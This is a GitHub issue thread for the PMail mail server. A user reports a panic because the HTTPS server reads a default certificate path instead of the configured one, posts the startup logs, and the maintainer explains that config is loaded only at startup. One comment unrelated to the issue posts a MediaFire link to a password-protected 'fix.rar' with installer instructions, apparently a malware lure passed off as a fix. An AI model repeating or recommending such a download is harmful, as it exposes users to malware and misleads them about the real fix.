### ISSUE TITLE
证书配置未能正常加载 

### ISSUE THREAD

**Issue by UGYnpU2nuB8QCFqDrsWZgmxMBp43WQ** [Jinnrry/PMail#193]
### 完整性要求 / Integrity requirements

- [X] 我保证阅读了文档，了解所有我编写的配置文件项的含义，而不是大量堆砌看似有用的选项或默认值。
- [X] 我提供了完整的配置文件和日志，而不是出于自己的判断只给出截取的部分。
- [X] 我搜索了issues，没有发现已提出的类似问题。
- [X] 我已经阅读了项目[Readme](https://github.com/Jinnrry/PMail/blob/master/README_CN.md)和[常见问题](https://github.com/Jinnrry/PMail/discussions/170)

### 版本

latest

### 描述

被覆盖的config.json被读取，然而后续程序仍然访问默认的证书路径

### 重现方式

有效config.json覆盖后，docker部署即可复现（没用程序文件部署是因为80端口上在跑着网站）

### 服务端配置

<details><pre><code>

</code></pre></details>

### 服务端日志

<details><pre><code>
[warning][2024-08-27 22:40:16][/work/res_init/init.go:52]Config File Info:  {"logLevel":"info","domain":"example.com","domains":["example.com"],"webDomain":"pmail.example.com","dkimPrivateKeyPath":"config/dkim/dkim.priv","sslType":"1","SSLPrivateKeyPath":"./config/ssl/privkey.pem","SSLPublicKeyPath":"./config/ssl/fullchain.pem","dbDSN":"pmail:pamil@tcp(mariadb:3306)/pmail?parseTime=True\u0026loc=Local","dbType":"mysql","httpsEnabled":1,"spamFilterLevel":0,"httpPort":0,"httpsPort":0,"weChatPushAppId":"","weChatPushSecret":"","weChatPushTemplateId":"","weChatPushUserId":"","tgBotToken":"1111111111:AAAAA-AAAAAAAAAAAAAAAAAniGAAAAAAAAA","tgChatId":"1111111111","isInit":true,"webPushUrl":"","webPushToken":""}
[info][2024-08-27 22:40:16][/work/pop3_server/pop3server.go:27]POP3 With TLS Server Start On Port :995
[info][2024-08-27 22:40:16][/work/smtp_server/smtp.go:147]Starting Smtp With SSL Server Port: :465
[info][2024-08-27 22:40:16][/work/http_server/https_server.go:50]Https Server Start On Port :443
panic: open config/ssl/public.crt: no such file or directory

goroutine 29 [running]:
github.com/Jinnrry/pmail/http_server.HttpsStart()
	/work/http_server/https_server.go:60 +0x205
created by github.com/Jinnrry/pmail/res_init.Init in goroutine 1
	/work/res_init/init.go:45 +0xd4
</code></pre></details>

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jinnrry** [comment]
你自己更新了config文件，但是程序没读取？是这个意思吗？

程序只会在启动的时候加载配置文件，不止PMail，无论是MySQL，Nginx还是什么软件，都是启动的时候加载配置文件到内存，后续不会主动监听配置文件变化。如果是你自己改了配置文件，你需要重启程序
